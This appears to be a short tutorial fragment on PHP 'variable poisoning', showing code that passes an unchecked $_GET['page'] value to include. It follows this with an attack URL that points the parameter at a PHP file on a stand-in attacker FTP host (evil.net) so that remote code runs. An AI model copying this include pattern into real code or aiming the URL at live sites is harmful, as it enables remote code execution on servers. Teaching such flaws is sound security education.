Variable Poisoning :: Chapter 1
Variable Poisoning :: Chapter 1
Expected URL:
http://example.org/?page=news.php&id=1234
if
(
file_exists
(
$
_GET
[
'page'
]
)
)
{
include
$
_GET
[
'page'
]
;
}
Attack:
./?page=ftp://user:pass@evil.net/arbitrary_code.php
<?php
// insert evil code here
?>